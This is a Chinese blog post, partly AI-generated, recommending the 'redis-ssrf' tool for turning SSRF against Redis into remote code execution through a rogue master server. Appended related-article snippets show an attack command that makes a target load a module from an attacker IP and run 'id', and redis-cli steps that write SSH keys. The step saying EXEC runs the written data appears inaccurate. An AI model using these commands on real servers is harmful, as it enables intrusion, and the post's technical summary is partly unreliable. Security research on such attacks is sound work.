开源项目推荐:redis-ssrf —— 利用SSRF攻击实现远程代码执行

最新推荐文章于 2025-03-31 22:16:57 发布
最新推荐文章于 2025-03-31 22:16:57 发布
阅读量753 收藏 12
点赞数 7
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_00002/article/details/142242911

开源项目推荐:redis-ssrf —— 利用SSRF攻击实现远程代码执行

redis-ssrf redis ssrf gopher generater & redis ssrf to rce by master-slave-sync redis-ssrf 项目地址: https://gitcode.com/gh_mirrors/re/redis-ssrf

一、项目介绍

redis-ssrf 是一个开源项目,主要利用了SSRF(服务端请求伪造)漏洞,通过Redis服务进行文件写入和远程代码执行攻击。该项目可以帮助安全研究人员和爱好者在合法范围内进行安全测试,提高系统安全性。

二、项目技术分析

项目主要基于Python语言开发,分为两个模块:

  1. ssrf-redis.py:适用于Python 2.x和3.x版本,用于生成攻击载荷。
  2. rogue-server.py:适用于Python 2.x版本,用于接收和执行攻击载荷。

项目通过构造特定的载荷,利用Redis服务的SSRF漏洞,实现远程文件写入和远程代码执行。具体技术实现如下:

  • 利用SSRF漏洞访问Redis服务,通过CONFIG命令设置Redis的工作目录和数据库文件路径。
  • 利用SLAVEOF命令将目标Redis服务作为从节点,指向攻击者的Redis服务器。
  • 利用PSYNC命令同步数据,将恶意数据写入目标Redis数据库。
  • 利用EXEC命令执行写入的恶意数据,实现远程代码执行。

三、项目及应用场景

redis-ssrf项目适用于以下场景:

  1. 安全测试:在合法范围内,对目标系统进行安全测试,发现潜在漏洞。
  2. 安全研究:对Redis服务的安全性进行深入研究和分析。
  3. 教育培训:用于教学和安全培训,提高人员的安全意识和技能。

四、项目特点

  1. 简单易用:项目提供了详细的说明文档,便于用户快速上手和使用。
  2. 多平台支持:适用于Python 2.x和3.x版本,可在多种操作系统上运行。
  3. 灵活性高:用户可以根据实际需求,修改载荷内容和参数,实现不同的攻击场景。
  4. 安全可靠:项目仅用于合法安全测试和研究,不涉及非法操作。

总之,redis-ssrf是一个极具实用性和价值的开源项目,适用于安全测试和研究领域。强烈推荐广大安全爱好者和专业人士关注和使用该项目。

redis-ssrf redis ssrf gopher generater & redis ssrf to rce by master-slave-sync redis-ssrf 项目地址: https://gitcode.com/gh_mirrors/re/redis-ssrf

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

Redis如何高效实现定时任务
禅与计算机程序设计的艺术
07-11 1194
时间事件可以是单次到期执行销毁,也可以是定时任务,对此redis对于时间事件统一封装为对象,通过id来唯一标识一个事件,结合when_sec和when_ms记录任务到期执行的秒和分,而执行时间事件的函数也是交由timeProc指针所指向的函数执行。
Redis渗透&SSRF利用-看这一篇就够了
永远都没有了
02-05 2203
关于redis的渗透利用,及SSRF的方式
网络安全实验-SSRF远程代码执行漏洞、旁注漏洞、越权漏洞、暴力猜解
qlbahuang的博客
07-24 935
网络安全实验:SSRF远程代码执行漏洞、bluecms旁注漏洞、水平越权&垂直越权漏洞、暴力猜解。这次实验任务量比较重,可以加强对基本渗透测试中部分漏洞的理解!
Redis远程代码执行(cnvd-2019-21763)
m0_65150886的博客
02-18 327
由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis实现一个新的Redis命令。python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp.so -c "id"Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。3.返回上一级目录,利用exp工具,执行id命令。1.下载exp利用工具。
利用 SSRFRedis 未授权访问进行内网渗透
最新发布
智商不在服务区的博客
03-31 917
在本次实验中,我们使用 Docker 环境进行测试。解压实验包,搭建docker环境。docker环境web的dockerfile主要利用代码redis服务器通过启动相关容器,初次启动失败。发现docker版本问题,删除docker版本 3,并尝试重新拉取重新启动后,环境成功搭建,获取内网 IP。我们使用抓包工具检测内网存活主机,发现172.18.0.2存在HTTP服务,并返回Go away。使用burpsuite对172.18.0.2进行端口扫描,发现6379端口返回Redis
SSRF攻击Redis
cosmoslin的博客
10-27 1570
Redis简介 Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持p
SSRFRedis利用
2301_80127209的博客
01-23 2064
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
qq_75120258的博客
03-29 2702
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
SSRF---gopher和dict打redis
unexpectedthing的博客
12-01 6625
前言 之前关于SSRFredis(redis的未授权漏洞)都没咋总结,现在总结一下。 redis简介 redis是一个key-value存储系统,是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。
Redis未授权访问及配合SSRF总结
saber的博客
10-24 1448
Redis是一个开源的内存数据库,它用于存储数据,并提供高性能、可扩展性和丰富的数据结构支持。默认情况下,会绑定在,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,并且写公匙登录。
SSRF 漏洞利用 Redis 实战全解析:原理、攻击与防范
xinyaoyaotu的博客
02-01 1817
利用 AntSword 等 Webshell 管理工具,配置连接地址为被攻击机的 IP 地址加上webshell.php路径,密码为webshell中已写入的密码,即可成功连接到目标服务器,实现对服务器的远程控制,执行系统命令、上传下载文件等操作。:在 Web 应用中,将频繁访问的数据存储在 Redis 中,大大减少数据库的负载,提高系统响应速度。:当 Redis 与存在 SSRF 漏洞的服务器结合时,攻击者可以利用 SSRF 漏洞,通过服务器间接控制 Redis,绕过网络限制,实现更复杂的攻击
RedisSSRF中的应用
feng的博客
10-06 3343
偶然找到的一篇文章,觉得写的很不错。本来只是收藏而不是转载,但是我发现这篇文章的原文已经挂了,因此就转载了过来。
Redis - - Redis 远程代码执行漏洞
weixin_34150830的博客
12-14 551
1,利用redis漏洞,远程登录服务器 1.1 登录远程 redis 并写入ssh公钥 [root@test ~]# redis-cli -h 192.168.168.168 -p 6379 -a 123456 # 设置路径等配置(必须有写入权限) 192.168.168.168:6379> config set dir /root/.ssh OK # 上传公钥的备份文件名字为autho...
SSRF漏洞之Redis利用
weixin_39664643的博客
01-21 3588
SSRF漏洞之Redis利用SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis SSRF攻击内网Redis 当存在SSRF漏洞且内网中Redis服务可以未授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网
SSRF+Redis进行内网渗透
zhuge_long的专栏
10-24 1445
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
ssrf+redis
qq_45213259的博客
11-30 3986
ssrf+redis 实验环境 靶机:ubuntu16.04 ip:192.168.211.130 在靶机中搭建lamp环境、安装redis、安装ssh 攻击机:kali2020 ip:192.168.211.134 在攻击机中安装redis vps:windows10(本机) ip:10.133.164.81 在windows中安装cn.exe 实验步骤 1.将ssrf.php文件放在web根目录下 ssrf.php: <?php $ch = curl_init(); curl_set
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 4239
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

司莹嫣Maude

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值